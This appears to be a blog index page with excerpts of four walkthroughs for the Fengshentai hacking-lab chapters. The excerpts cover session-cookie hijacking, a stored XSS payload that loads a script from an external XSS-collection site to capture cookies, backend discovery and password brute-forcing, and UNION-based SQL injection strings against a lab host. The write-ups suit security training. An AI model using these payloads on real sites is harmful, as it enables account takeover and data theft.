封神台
ploto_cs
简单介绍一下:素质教育的漏网之鱼
展开
-
封神台-第5章 绕过防护上传木马
封神台-第5章 绕过防护上传木马1.登录后台获得了管理员的cookie后,去掉里面的flag部分,取出两个有效的键值对,把他们加到登录的cookie里就行了键值对为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC在这个页面按F12 进入存储界面,更改name和value字段将ADMINSESSIONIDCSTRCSDQ粘贴在Name下将LBMLMBCCNPFINOANFGLPCFBC粘贴在value修改成功后刷新点击“准备好了吗”进入以下页原创 2020-09-27 15:27:26 · 683 阅读 · 0 评论 -
封神台-第四章 为了更多的权限!留言板
封神台-第四章 为了更多的权限!留言板1.进入留言的页面,测试弹窗根据提示为存储型XSS测试语句为 可以看到成功弹窗2.搭建xss平台随意注册一个账户https://xsspt.com/index.php?do=login配置前两个必须选复制语句:</textarea>'"><script src=https://xsspt.com/ZIVFnr?1601173210></script>3.测试新语句4.在xss平台看截取原创 2020-09-27 10:37:40 · 1171 阅读 · 0 评论 -
封神台-第三章 爆破管理员账户登录后台
封神台-第三章 爆破管理员账户登录后台1.探测真实登录网址有题目可知,8004端口下admin是假后台,故使用御剑探测8004端口2.探测可得,admin123才是真后台3.使用上一章节爆破出的密码继续登录账户:admin密码:welcome成功登录后可得4.分析代码① 从请求头中拿到Referer,并赋值给ComeUrl。② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cU原创 2020-09-26 18:52:42 · 2735 阅读 · 0 评论 -
封神台-第二章 尤里的复仇
封神台-第二章 尤里的复仇1.任意选择一条新闻动态2.发现出现交互界面 url中id=170 存在注入点3.判断字段数?id=170+order+by+10?id=170+order+by+114.使用modheader直接在url中输入 报错第一个字段写cookie 第二个字段 id=170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+from+admin5.在url中输入http://59.63.200.79:8004/shownews.asp原创 2020-09-26 11:23:37 · 2044 阅读 · 1 评论